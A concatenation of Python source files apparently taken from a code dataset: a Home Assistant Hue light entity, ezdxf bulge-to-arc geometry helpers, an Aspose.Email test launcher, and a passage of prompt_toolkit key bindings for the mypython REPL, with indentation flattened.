return await bridge.async_request_call(fetch_method)
except aiohue.Unauthorized as err:
await bridge.handle_unauthorized_error()
raise UpdateFailed("Unauthorized") from err
except aiohue.AiohueException as err:
raise UpdateFailed(f"Hue error: {err}") from err
@callback
def async_update_items(
bridge, api, current, async_add_entities, create_item, new_items_callback
):
"""Update items."""
new_items = []
for item_id in api:
if item_id in current:
continue
current[item_id] = create_item(api, item_id)
new_items.append(current[item_id])
bridge.hass.async_create_task(remove_devices(bridge, api, current))
if new_items:
# This is currently used to setup the listener to update rooms
if new_items_callback:
new_items_callback()
async_add_entities(new_items)
def hue_brightness_to_hass(value):
"""Convert hue brightness 1..254 to hass format 0..255."""
return min(255, round((value / 254) * 255))
def hass_to_hue_brightness(value):
"""Convert hass brightness 0..255 to hue 1..254 scale."""
return max(1, round((value / 255) * 254))
class HueLight(CoordinatorEntity, LightEntity):
"""Representation of a Hue light."""
def __init__(self, coordinator, bridge, is_group, light, supported_features, rooms):
"""Initialize the light."""
super().__init__(coordinator)
self.light = light
self.bridge = bridge
self.is_group = is_group
self._supported_features = supported_features
self._rooms = rooms
if is_group:
self.is_osram = False
self.is_philips = False
self.is_innr = False
self.is_ewelink = False
self.is_livarno = False
self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
self.gamut = None
else:
self.is_osram = light.manufacturername == "OSRAM"
self.is_philips = light.manufacturername == "Philips"
self.is_innr = light.manufacturername == "innr"
self.is_ewelink = light.manufacturername == "eWeLink"
self.is_livarno = light.manufacturername.startswith("_TZ3000_")
self.gamut_typ = self.light.colorgamuttype
self.gamut = self.light.colorgamut
_LOGGER.debug("Color gamut of %s: %s", self.name, str(self.gamut))
if self.light.swupdatestate == "readytoinstall":
err = (
"Please check for software updates of the %s "
"bulb in the Philips Hue App."
)
_LOGGER.warning(err, self.name)
if self.gamut and not color.check_valid_gamut(self.gamut):
err = "Color gamut of %s: %s, not valid, setting gamut to None."
_LOGGER.debug(err, self.name, str(self.gamut))
self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
self.gamut = None
@property
def unique_id(self):
"""Return the unique ID of this Hue light."""
unique_id = self.light.uniqueid
if not unique_id and self.is_group and self.light.room:
unique_id = self.light.room["id"]
return unique_id
@property
def device_id(self):
"""Return the ID of this Hue light."""
return self.unique_id
@property
def name(self):
"""Return the name of the Hue light."""
return self.light.name
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
if self.is_group:
bri = self.light.action.get("bri")
else:
bri = self.light.state.get("bri")
if bri is None:
return bri
return hue_brightness_to_hass(bri)
@property
def _color_mode(self):
"""Return the hue color mode."""
if self.is_group:
return self.light.action.get("colormode")
return self.light.state.get("colormode")
@property
def hs_color(self):
"""Return the hs color value."""
mode = self._color_mode
source = self.light.action if self.is_group else self.light.state
if mode in ("xy", "hs") and "xy" in source:
return color.color_xy_to_hs(*source["xy"], self.gamut)
return None
@property
def color_temp(self):
"""Return the CT color value."""
# Don't return color temperature unless in color temperature mode
if self._color_mode != "ct":
return None
if self.is_group:
return self.light.action.get("ct")
return self.light.state.get("ct")
@property
def min_mireds(self):
"""Return the coldest color_temp that this light supports."""
if self.is_group:
return super().min_mireds
min_mireds = self.light.controlcapabilities.get("ct", {}).get("min")
# We filter out '0' too, which can be incorrectly reported by 3rd party buls
if not min_mireds:
return super().min_mireds
return min_mireds
@property
def max_mireds(self):
"""Return the warmest color_temp that this light supports."""
if self.is_group:
return super().max_mireds
if self.is_livarno:
return 500
max_mireds = self.light.controlcapabilities.get("ct", {}).get("max")
if not max_mireds:
return super().max_mireds
return max_mireds
@property
def is_on(self):
"""Return true if device is on."""
if self.is_group:
return self.light.state["any_on"]
return self.light.state["on"]
@property
def available(self):
"""Return if light is available."""
return self.coordinator.last_update_success and (
self.is_group
or self.bridge.allow_unreachable
or self.light.state["reachable"]
)
@property
def supported_features(self):
"""Flag supported features."""
return self._supported_features
@property
def effect(self):
"""Return the current effect."""
return self.light.state.get("effect", None)
@property
def effect_list(self):
"""Return the list of supported effects."""
if self.is_osram:
return [EFFECT_RANDOM]
return [EFFECT_COLORLOOP, EFFECT_RANDOM]
@property
def device_info(self) -> DeviceInfo | None:
"""Return the device info."""
if self.light.type in (
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_ROOM,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_LIGHT_SOURCE,
):
return None
suggested_area = None
if self.light.id in self._rooms:
suggested_area = self._rooms[self.light.id]
return DeviceInfo(
identifiers={(HUE_DOMAIN, self.device_id)},
manufacturer=self.light.manufacturername,
# productname added in Hue Bridge API 1.24
# (published 03/05/2018)
model=self.light.productname or self.light.modelid,
name=self.name,
# Not yet exposed as properties in aiohue
suggested_area=suggested_area,
sw_version=self.light.raw["swversion"],
via_device=(HUE_DOMAIN, self.bridge.api.config.bridgeid),
)
async def async_added_to_hass(self) -> None:
"""Handle entity being added to Home Assistant."""
self.async_on_remove(
self.bridge.listen_updates(
self.light.ITEM_TYPE, self.light.id, self.async_write_ha_state
)
)
await super().async_added_to_hass()
async def async_turn_on(self, **kwargs):
"""Turn the specified or all lights on."""
command = {"on": True}
if ATTR_TRANSITION in kwargs:
command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10)
if ATTR_HS_COLOR in kwargs:
if self.is_osram:
command["hue"] = int(kwargs[ATTR_HS_COLOR][0] / 360 * 65535)
command["sat"] = int(kwargs[ATTR_HS_COLOR][1] / 100 * 255)
else:
# Philips hue bulb models respond differently to hue/sat
# requests, so we convert to XY first to ensure a consistent
# color.
xy_color = color.color_hs_to_xy(*kwargs[ATTR_HS_COLOR], self.gamut)
command["xy"] = xy_color
elif ATTR_COLOR_TEMP in kwargs:
temp = kwargs[ATTR_COLOR_TEMP]
command["ct"] = max(self.min_mireds, min(temp, self.max_mireds))
if ATTR_BRIGHTNESS in kwargs:
command["bri"] = hass_to_hue_brightness(kwargs[ATTR_BRIGHTNESS])
flash = kwargs.get(ATTR_FLASH)
if flash == FLASH_LONG:
command["alert"] = "lselect"
del command["on"]
elif flash == FLASH_SHORT:
command["alert"] = "select"
del command["on"]
elif not self.is_innr and not self.is_ewelink and not self.is_livarno:
command["alert"] = "none"
if ATTR_EFFECT in kwargs:
effect = kwargs[ATTR_EFFECT]
if effect == EFFECT_COLORLOOP:
command["effect"] = "colorloop"
elif effect == EFFECT_RANDOM:
command["hue"] = random.randrange(0, 65535)
command["sat"] = random.randrange(150, 254)
else:
command["effect"] = "none"
if self.is_group:
await self.bridge.async_request_call(
partial(self.light.set_action, **command)
)
else:
await self.bridge.async_request_call(
partial(self.light.set_state, **command)
)
await self.coordinator.async_request_refresh()
async def async_turn_off(self, **kwargs):
"""Turn the specified or all lights off."""
command = {"on": False}
if ATTR_TRANSITION in kwargs:
command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10)
flash = kwargs.get(ATTR_FLASH)
if flash == FLASH_LONG:
command["alert"] = "lselect"
del command["on"]
elif flash == FLASH_SHORT:
command["alert"] = "select"
del command["on"]
elif not self.is_innr and not self.is_livarno:
command["alert"] = "none"
if self.is_group:
await self.bridge.async_request_call(
partial(self.light.set_action, **command)
)
else:
await self.bridge.async_request_call(
partial(self.light.set_state, **command)
)
await self.coordinator.async_request_refresh()
@property
def extra_state_attributes(self):
"""Return the device state attributes."""
if not self.is_group:
return {}
return {ATTR_IS_HUE_GROUP: self.is_group}
| 2.125 | 2 |
src/ezdxf/math/bulge.py | dmtvanzanten/ezdxf | 0 | 3463 | <gh_stars>0
# Copyright (c) 2018-2021 <NAME>
# License: MIT License
# source: http://www.lee-mac.com/bulgeconversion.html
# source: http://www.afralisp.net/archive/lisp/Bulges1.htm
from typing import Any, TYPE_CHECKING, Tuple
import math
from ezdxf.math import Vec2
if TYPE_CHECKING:
from ezdxf.eztypes import Vertex
__all__ = [
"bulge_to_arc", "bulge_3_points", "bulge_center", "bulge_radius",
"arc_to_bulge"
]
def polar(p: Any, angle: float, distance: float) -> Vec2:
""" Returns the point at a specified `angle` and `distance` from point `p`.
Args:
p: point as :class:`Vec2` compatible object
angle: angle in radians
distance: distance
"""
return Vec2(p) + Vec2.from_angle(angle, distance)
def angle(p1: Any, p2: Any) -> float:
""" Returns angle a line defined by two endpoints and x-axis in radians.
Args:
p1: start point as :class:`Vec2` compatible object
p2: end point as :class:`Vec2` compatible object
"""
return (Vec2(p2) - Vec2(p1)).angle
def arc_to_bulge(center: 'Vertex', start_angle: float, end_angle: float,
radius: float) -> Tuple['Vec2', 'Vec2', float]:
"""
Returns bulge parameters from arc parameters.
Args:
center: circle center point as :class:`Vec2` compatible object
start_angle: start angle in radians
end_angle: end angle in radians
radius: circle radius
Returns:
tuple: (start_point, end_point, bulge)
"""
start_point = polar(center, start_angle, radius)
end_point = polar(center, end_angle, radius)
pi2 = math.pi * 2
a = math.fmod((pi2 + (end_angle - start_angle)), pi2) / 4.
bulge = math.sin(a) / math.cos(a)
return start_point, end_point, bulge
def bulge_3_points(start_point: 'Vertex', end_point: 'Vertex',
point: 'Vertex') -> float:
""" Returns bulge value defined by three points.
Based on 3-Points to Bulge by `Lee Mac`_.
Args:
start_point: start point as :class:`Vec2` compatible object
end_point: end point as :class:`Vec2` compatible object
point: arbitrary point as :class:`Vec2` compatible object
"""
a = (math.pi - angle(point, start_point) + angle(point, end_point)) / 2
return math.sin(a) / math.cos(a)
def bulge_to_arc(start_point: 'Vertex',
end_point: 'Vertex',
bulge: float) -> Tuple['Vec2', float, float, float]:
""" Returns arc parameters from bulge parameters.
The arcs defined by bulge values of :class:`~ezdxf.entities.LWPolyline`
and 2D :class:`~ezdxf.entities.Polyline` entities start at the vertex which
includes the bulge value and ends at the following vertex.
Based on Bulge to Arc by `Lee Mac`_.
Args:
start_point: start vertex as :class:`Vec2` compatible object
end_point: end vertex as :class:`Vec2` compatible object
bulge: bulge value
Returns:
Tuple: (center, start_angle, end_angle, radius)
"""
r = signed_bulge_radius(start_point, end_point, bulge)
a = angle(start_point, end_point) + (math.pi / 2 - math.atan(bulge) * 2)
c = polar(start_point, a, r)
if bulge < 0:
return c, angle(c, end_point), angle(c, start_point), abs(r)
else:
return c, angle(c, start_point), angle(c, end_point), abs(r)
def bulge_center(start_point: 'Vertex', end_point: 'Vertex',
bulge: float) -> 'Vec2':
""" Returns center of arc described by the given bulge parameters.
Based on Bulge Center by `<NAME>`_.
Args:
start_point: start point as :class:`Vec2` compatible object
end_point: end point as :class:`Vec2` compatible object
bulge: bulge value as float
"""
start_point = Vec2(start_point)
a = angle(start_point, end_point) + (math.pi / 2. - math.atan(bulge) * 2.)
return start_point + Vec2.from_angle(a, signed_bulge_radius(start_point,
end_point,
bulge))
def signed_bulge_radius(start_point: 'Vertex', end_point: 'Vertex',
bulge: float) -> float:
return Vec2(start_point).distance(Vec2(end_point)) * (
1. + (bulge * bulge)) / 4. / bulge
def bulge_radius(start_point: 'Vertex', end_point: 'Vertex',
bulge: float) -> float:
""" Returns radius of arc defined by the given bulge parameters.
Based on Bulge Radius by `<NAME>`_
Args:
start_point: start point as :class:`Vec2` compatible object
end_point: end point as :class:`Vec2` compatible object
bulge: bulge value
"""
return abs(signed_bulge_radius(start_point, end_point, bulge))
| 2.984375 | 3 |
Plugins/Aspose.Email Java for Python/tests/ProgrammingEmail/ManageAttachments/ManageAttachments.py | aspose-email/Aspose.Email-for-Java | 24 | 3464 | <gh_stars>10-100
# To change this license header, choose License Headers in Project Properties.
# To change this template file, choose Tools | Templates
# and open the template in the editor.
#if __name__ == "__main__":
# print "Hello World"
from ProgrammingEmail import ManageAttachments
import jpype
import os.path
asposeapispath = os.path.join(os.path.abspath("./../../../"), "lib/")
dataDir = os.path.join(os.path.abspath("./"), "data/")
print "You need to put your Aspose.Email for Java APIs .jars in this folder:\n"+asposeapispath
#print dataDir
jpype.startJVM(jpype.getDefaultJVMPath(), "-Djava.ext.dirs=%s" % asposeapispath)
hw = ManageAttachments(dataDir)
hw.main() | 1.820313 | 2 |
mypython/keys.py | asmeurer/mypython | 27 | 3465 | from prompt_toolkit.key_binding.bindings.named_commands import (accept_line,
self_insert, backward_delete_char, beginning_of_line)
from prompt_toolkit.key_binding.bindings.basic import if_no_repeat
from prompt_toolkit.key_binding.bindings.basic import load_basic_bindings
from prompt_toolkit.key_binding.bindings.emacs import load_emacs_bindings, load_emacs_search_bindings
from prompt_toolkit.key_binding.bindings.mouse import load_mouse_bindings
from prompt_toolkit.key_binding.bindings.cpr import load_cpr_bindings
from prompt_toolkit.key_binding.bindings.page_navigation import load_emacs_page_navigation_bindings
from prompt_toolkit.key_binding import KeyBindings, merge_key_bindings
from prompt_toolkit.keys import Keys, ALL_KEYS
from prompt_toolkit.filters import Condition, HasSelection, is_searching
from prompt_toolkit.selection import SelectionState
from prompt_toolkit.clipboard import ClipboardData
from prompt_toolkit.input.vt100_parser import ANSI_SEQUENCES
from prompt_toolkit.application.current import get_app
from prompt_toolkit.application import run_in_terminal
from prompt_toolkit import __version__ as prompt_toolkit_version
from .multiline import (auto_newline, tab_should_insert_whitespace,
document_is_multiline_python)
from .tokenize import inside_string, matching_parens
from .theme import emoji, emoji_pudb
from .processors import get_pyflakes_warnings
import re
import subprocess
import sys
import textwrap
import platform
def get_key_bindings():
# Based on prompt_toolkit.key_binding.defaults.load_key_bindings()
return merge_key_bindings([
load_basic_bindings(),
load_emacs_bindings(),
load_emacs_search_bindings(),
load_emacs_page_navigation_bindings(),
load_mouse_bindings(),
load_cpr_bindings(),
custom_key_bindings,
])
r = custom_key_bindings = KeyBindings()
def warning_positions(event):
document = event.current_buffer.document
warnings = get_pyflakes_warnings(document.text, frozenset(event.current_buffer.session._locals))
positions = []
for (row, col, msg, m) in warnings:
# Handle SyntaxErrorMessage which is the same warning for the whole
# line.
if m.col != col:
continue
pos = document.translate_row_col_to_index(row, col)
positions.append(pos)
return positions
@r.add_binding(Keys.Escape, 'p')
def previous_warning(event):
positions = warning_positions(event)
buffer = event.current_buffer
buffer._show_syntax_warning = True
if not positions or positions[0] >= buffer.cursor_position:
return
p = positions[0]
for pos in positions:
if pos >= buffer.cursor_position:
break
p = pos
event.current_buffer._show_syntax_warning = True
event.current_buffer.cursor_position = p
@r.add_binding(Keys.Escape, 'n')
def next_warning(event):
positions = warning_positions(event)
buffer = event.current_buffer
buffer._show_syntax_warning = True
if not positions or positions[-1] <= buffer.cursor_position:
return
p = positions[-1]
for pos in reversed(positions):
if pos <= buffer.cursor_position:
break
p = pos
event.current_buffer.cursor_position = p
# This can be removed once
# https://github.com/prompt-toolkit/python-prompt-toolkit/pull/857 is in a
# released version of prompt-toolkit.
ANSI_SEQUENCES['\x1b[1;9A'] = (Keys.Escape, Keys.Up)
ANSI_SEQUENCES['\x1b[1;9B'] = (Keys.Escape, Keys.Down)
@r.add_binding(Keys.Escape, Keys.Up)
def previous_history_search(event):
event.key_sequence[-1].accept_next = True
buffer = event.current_buffer
buffer.history_backward(count=event.arg, history_search=True)
@r.add_binding(Keys.Escape, 'P')
@r.add_binding(Keys.Escape, Keys.Down)
def forward_history_search(event):
event.key_sequence[-1].accept_next = True
buffer = event.current_buffer
buffer.history_forward(count=event.arg, history_search=True)
@r.add_binding(Keys.Escape, '<')
def beginning(event):
"""
Move to the beginning
"""
event.current_buffer.cursor_position = 0
@r.add_binding(Keys.Escape, '>')
def end(event):
"""
Move to the end
"""
event.current_buffer.cursor_position = len(event.current_buffer.text)
# Document.start_of_paragraph/end_of_paragraph don't treat multiple blank
# lines correctly.
# Gives the positions right before one or more blank lines
BLANK_LINES = re.compile(r'\S *(\n *\n)')
@r.add_binding(Keys.Escape, '}')
def forward_paragraph(event):
"""
Move forward one paragraph of text
"""
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in BLANK_LINES.finditer(text):
if m.start(0) > cursor_position:
event.current_buffer.cursor_position = m.start(1)+1
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, '{')
def backward_paragraph(event):
"""
Move back one paragraph of text
"""
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in BLANK_LINES.finditer(text[::-1]):
if m.start(0) > len(text) - cursor_position:
event.current_buffer.cursor_position = len(text) - m.end(1) + 1
return
event.current_buffer.cursor_position = 0
WORD = re.compile(r'([a-z0-9]+|[A-Z]{2,}|[a-zA-Z0-9][a-z0-9]*)')
@r.add_binding(Keys.Escape, 'f')
@r.add_binding(Keys.Escape, Keys.Right)
def forward_word(event):
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
if m.end(0) > cursor_position:
event.current_buffer.cursor_position = m.end(0)
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, 'b')
@r.add_binding(Keys.Escape, Keys.Left)
def backward_word(event):
"""
Move back one paragraph of text
"""
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in reversed(list(WORD.finditer(text))):
if m.start(0) < cursor_position:
event.current_buffer.cursor_position = m.start(0)
return
event.current_buffer.cursor_position = 0
@r.add_binding(Keys.Escape, 'd')
def kill_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = buffer.cursor_position
pos = None
for m in WORD.finditer(text):
if m.end(0) > cursor_position:
pos = m.end(0) - cursor_position
break
if pos:
deleted = buffer.delete(count=pos)
event.app.clipboard.set_text(deleted)
@r.add_binding(Keys.Escape, Keys.Backspace)
def backward_kill_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = buffer.cursor_position
for m in reversed(list(WORD.finditer(text))):
if m.start(0) < cursor_position:
pos = cursor_position - m.start(0)
break
else:
pos = buffer.cursor_position
if pos:
deleted = buffer.delete_before_cursor(count=pos)
event.app.clipboard.set_text(deleted)
def insert_text_ovewrite(buffer, data, move_cursor=True):
"""
Insert characters at cursor position.
:param fire_event: Fire `on_text_insert` event. This is mainly used to
trigger autocompletion while typing.
"""
# Original text & cursor position.
otext = buffer.text
ocpos = buffer.cursor_position
# Don't overwrite the newline itself. Just before the line ending,
# it should act like insert mode.
overwritten_text = otext[ocpos:ocpos + len(data)]
buffer.text = otext[:ocpos] + data + otext[ocpos + len(overwritten_text):]
if move_cursor:
buffer.cursor_position += len(data)
@r.add_binding(Keys.Escape, 'l')
def downcase_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
pos = m.end(0)
if pos > cursor_position:
word = buffer.document.text[cursor_position:pos]
insert_text_ovewrite(buffer, word.lower())
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, 'u')
def upcase_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
pos = m.end(0)
if pos > cursor_position:
word = buffer.document.text[cursor_position:pos]
insert_text_ovewrite(buffer, word.upper())
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, 'c')
def capitalize_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
pos = m.end(0)
if pos > cursor_position:
word = buffer.document.text[cursor_position:pos]
# Don't use word.capitalize() because the first character could be
# - or _
for i, c in enumerate(word):
if c.isalnum():
word = word[:i] + c.capitalize() + word[i+1:].lower()
break
insert_text_ovewrite(buffer, word)
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, Keys.ControlF)
def forward_sexp(event):
buffer = event.current_buffer
document = buffer.document
text = buffer.text
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
matching, mismatching = matching_parens(text)
for opening, closing in matching:
if opening.start == (row, col):
new_pos = document.translate_row_col_to_index(closing.end[0]-1, closing.end[1])
buffer.cursor_position = new_pos
return
event.app.output.bell()
@r.add_binding(Keys.Escape, Keys.ControlB)
def backward_sexp(event):
buffer = event.current_buffer
document = buffer.document
text = buffer.text
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
matching, mismatching = matching_parens(text)
for opening, closing in matching:
if closing.end == (row, col):
new_pos = document.translate_row_col_to_index(opening.start[0]-1, opening.start[1])
buffer.cursor_position = new_pos
return
event.app.output.bell()
@r.add_binding(Keys.Left)
def left_multiline(event):
"""
Left that wraps around in multiline.
"""
if event.current_buffer.cursor_position - event.arg >= 0:
event.current_buffer.cursor_position -= event.arg
if getattr(event.current_buffer.selection_state, "shift_arrow", False):
event.current_buffer.selection_state = None
@r.add_binding(Keys.Right)
def right_multiline(event):
"""
Right that wraps around in multiline.
"""
if event.current_buffer.cursor_position + event.arg <= len(event.current_buffer.text):
event.current_buffer.cursor_position += event.arg
if getattr(event.current_buffer.selection_state, "shift_arrow", False):
event.current_buffer.selection_state = None
@r.add_binding(Keys.ControlD)
def exit(event):
event.app.exit(exception=EOFError, style='class:exiting')
@r.add_binding(Keys.ControlC, filter=~is_searching)
def keyboard_interrupt(event):
event.app.exit(exception=KeyboardInterrupt, style='class:aborting')
is_returnable = Condition(
lambda: get_app().current_buffer.is_returnable)
@r.add_binding(Keys.Enter, filter=is_returnable)
def multiline_enter(event):
"""
When not in multiline, execute. When in multiline, try to
intelligently add a newline or execute.
"""
buffer = event.current_buffer
document = buffer.document
multiline = document_is_multiline_python(document)
text_after_cursor = document.text_after_cursor
text_before_cursor = document.text_before_cursor
text = buffer.text
# isspace doesn't respect vacuous truth
if (not text_after_cursor or text_after_cursor.isspace()) and text_before_cursor.replace(' ', '').endswith('\n'):
# If we are at the end of the buffer, accept unless we are in a
# docstring
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
if multiline and inside_string(text, row, col):
# We are inside a docstring
auto_newline(event.current_buffer)
else:
accept_line(event)
elif not multiline:
# Always accept a single valid line. Also occurs for unclosed single
# quoted strings (which will give a syntax error)
accept_line(event)
else:
auto_newline(event.current_buffer)
# Always accept the line if the previous key was Up
# Requires https://github.com/jonathanslenders/python-prompt-toolkit/pull/492.
# We don't need a parallel for down because down is already at the end of the
# prompt.
@r.add_binding(Keys.Enter, filter=is_returnable)
def accept_after_history_backward(event):
pks = event.previous_key_sequence
if pks and getattr(pks[-1], 'accept_next', False) and ((len(pks) == 1 and
pks[0].key == "up") or (len(pks) == 2 and pks[0].key == "escape"
and isinstance(pks[1].key, str) and pks[1].key in ['p', 'P', 'up',
'down'])):
accept_line(event)
else:
multiline_enter(event)
@r.add_binding(Keys.Escape, Keys.Enter)
@r.add_binding(Keys.Escape, Keys.ControlJ)
def insert_newline(event):
auto_newline(event.current_buffer)
@r.add_binding(Keys.ControlO)
def open_line(event):
event.current_buffer.newline(copy_margin=False)
event.current_buffer.cursor_left()
# M-[ a g is set to S-Enter in iTerm2 settings
Keys.ShiftEnter = "<Shift-Enter>"
ALL_KEYS.append('<Shift-Enter>')
ANSI_SEQUENCES['\x1b[ag'] = Keys.ShiftEnter
ANSI_SEQUENCES['\x1bOM'] = Keys.ShiftEnter
if prompt_toolkit_version[0] != '3':
r.add_binding(Keys.ShiftEnter)(accept_line)
@r.add_binding(Keys.Tab, filter=tab_should_insert_whitespace)
def indent(event):
"""
When tab should insert whitespace, do that instead of completion.
"""
# Text before cursor on the line must be whitespace because of the
# TabShouldInsertWhitespaceFilter.
before_cursor = event.app.current_buffer.document.current_line_before_cursor
event.app.current_buffer.insert_text(' '*(4 - len(before_cursor)%4))
LEADING_WHITESPACE = re.compile(r'( *)[^ ]?')
@r.add_binding(Keys.Escape, 'm')
def back_to_indentation(event):
"""
Move back to the beginning of the line, ignoring whitespace.
"""
current_line = event.app.current_buffer.document.current_line
before_cursor = event.app.current_buffer.document.current_line_before_cursor
indent = LEADING_WHITESPACE.search(current_line)
if indent:
event.app.current_buffer.cursor_position -= len(before_cursor) - indent.end(1)
@r.add_binding(Keys.Backspace, save_before=if_no_repeat)
def delete_char_or_unindent(event):
buffer = event.app.current_buffer
if buffer.document.current_line_before_cursor.isspace():
spaces = len(buffer.document.current_line_before_cursor)
# Delete up to the tab stop
buffer.delete_before_cursor(count=4 + spaces%-4)
else:
backward_delete_char(event)
# Reset the history search text
buffer.history_search_text = None
@r.add_binding(Keys.Escape, ' ')
def cycle_spacing(event):
"""
Based on emacs's cycle-spacing
On first call, remove all whitespace (if any) from around the cursor and
replace it with a single space.
On second call, remove all whitespace.
On third call, restore the original whitespace and cursor position.
"""
buffer = event.app.current_buffer
# Avoid issues when text grows or shrinks below, keeping the cursor
# position out of sync
cursor_position = buffer.cursor_position
buffer.cursor_position = 0
buffer.text, buffer.cursor_position = do_cycle_spacing(buffer.text, cursor_position)
def do_cycle_spacing(text, cursor_position, state=[]):
rstripped = text[:cursor_position].rstrip()
lstripped = text[cursor_position:].lstrip()
text_before_cursor = text[:cursor_position]
# The first element of state is the original text. The last element is the
# buffer text and cursor position as we last left them. If either of those
# have changed, reset. The state here is global, but that's fine, because
# we consider any change to be enough clear the state. The worst that
# happens here is that we resume when we shouldn't if things look exactly
# as they did where we left off.
# TODO: Use event.previous_key_sequence instead.
if state and state[-1] != (text, cursor_position):
state.clear()
if len(state) == 0:
# Replace all whitespace at the cursor (if any) with a single space.
state.append((text, cursor_position))
cursor_position -= len(text_before_cursor) - len(rstripped) -1
text = rstripped + ' ' + lstripped
state.append((text, cursor_position))
elif len(state) == 2:
# Exactly one space at the cursor. Remove it.
cursor_position -= 1
text = rstripped + lstripped
state.append((text, cursor_position))
elif len(state) == 3:
# Restore original text and cursor position
text, cursor_position = state[0]
state.clear()
if cursor_position < 0:
cursor_position = 0
if cursor_position > len(text):
cursor_position = len(text)
return text, cursor_position
@r.add_binding(Keys.ControlX, Keys.ControlO)
def delete_blank_lines(event):
"""
On blank line, delete all surrounding blank lines, leaving just one.
On isolated blank line, delete that one.
On nonblank line, delete any immediately following blank lines.
"""
buffer = event.app.current_buffer
document = buffer.document
lines_up_to_current = document.lines[:document.cursor_position_row+1]
lines_after_current = document.lines[document.cursor_position_row+1:]
blank_lines_before = 0
for line in lines_up_to_current[::-1]:
if not line.strip():
blank_lines_before += 1
else:
break
blank_lines_after = 0
for line in lines_after_current:
if not line.strip():
blank_lines_after += 1
else:
break
if not blank_lines_before:
stripped_before = lines_up_to_current
else:
stripped_before = lines_up_to_current[:-blank_lines_before]
stripped_after = lines_after_current[blank_lines_after:]
# XXX: Emacs always keeps a newline at the end of the file, but I don't
# think it matters here.
if (not blank_lines_before and blank_lines_after) or blank_lines_before + blank_lines_after == 1:
new_text = '\n'.join(stripped_before + stripped_after)
elif blank_lines_before + blank_lines_after == 0:
return
else:
buffer.cursor_up(max(blank_lines_before-1, 0))
new_text = '\n'.join(stripped_before + [''] + stripped_after)
# Even though we do auto_up, it can be out of bounds from trailing
# whitespace
buffer.cursor_position = min(buffer.cursor_position, len(new_text))
buffer.text = new_text
@r.add_binding(Keys.ControlX, Keys.ControlT)
def transpose_lines(event):
buffer = event.current_buffer
document = buffer.document
row = document.cursor_position_row
new_lines = document.lines[:]
if len(new_lines) == 1:
new_lines.append('')
if row == 0:
buffer.cursor_down()
row += 1
if row == len(new_lines) - 1:
new_lines.append('')
new_lines[row], new_lines[row-1] = new_lines[row-1], new_lines[row]
buffer.text = '\n'.join(new_lines)
buffer.cursor_down()
beginning_of_line(event)
# Selection stuff
@r.add_binding(Keys.ShiftLeft)
def select_left(event):
buffer = event.current_buffer
if buffer.document.text_before_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
buffer.cursor_position -= event.arg
@r.add_binding(Keys.ShiftRight)
def select_right(event):
buffer = event.current_buffer
if buffer.document.text_after_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
buffer.cursor_position += event.arg
@r.add_binding(Keys.Up)
def auto_up(event):
buffer = event.current_buffer
count = event.arg
if buffer.document.cursor_position_row > 0:
buffer.cursor_up(count=count)
elif not buffer.selection_state:
event.key_sequence[-1].accept_next = True
buffer.history_backward(count=count)
if getattr(buffer.selection_state, "shift_arrow", False):
buffer.selection_state = None
@r.add_binding(Keys.Down)
def auto_down(event):
buffer = event.current_buffer
count = event.arg
if buffer.document.cursor_position_row < buffer.document.line_count - 1:
buffer.cursor_down(count=count)
elif not buffer.selection_state:
buffer.history_forward(count=count)
if getattr(buffer.selection_state, "shift_arrow", False):
buffer.selection_state = None
@r.add_binding(Keys.ShiftUp)
def select_line_up(event):
buffer = event.current_buffer
if buffer.document.text_before_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
up_position = buffer.document.get_cursor_up_position()
buffer.cursor_position += up_position
if not up_position:
buffer.cursor_position = 0
@r.add_binding(Keys.ShiftDown)
def select_line_down(event):
buffer = event.current_buffer
if buffer.document.text_after_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
down_position = buffer.document.get_cursor_down_position()
buffer.cursor_position += down_position
if not down_position:
buffer.cursor_position = len(buffer.document.text)
# The default doesn't toggle correctly
@r.add_binding(Keys.ControlSpace)
def toggle_selection(event):
buffer = event.current_buffer
if buffer.selection_state:
buffer.selection_state = None
else:
buffer.start_selection()
@r.add_binding(Keys.ControlX, 'h')
def select_all(event):
buffer = event.current_buffer
buffer.selection_state = SelectionState(len(buffer.document.text))
buffer.cursor_position = 0
@r.add_binding(Keys.Delete, filter=HasSelection())
@r.add_binding(Keys.Backspace, filter=HasSelection())
def delete_selection(event):
event.current_buffer.cut_selection()
@r.add_binding(Keys.Any, filter=HasSelection())
def self_insert_and_clear_selection(event):
event.current_buffer.cut_selection()
self_insert(event)
@r.add_binding(Keys.ControlK, filter=HasSelection())
@r.add_binding(Keys.ControlU, filter=HasSelection())
def kill_selection(event):
data = event.current_buffer.cut_selection()
event.app.clipboard.set_data(data)
def system_copy(text):
if "Linux" in platform.platform():
copy_command = ['xclip', '-selection', 'c']
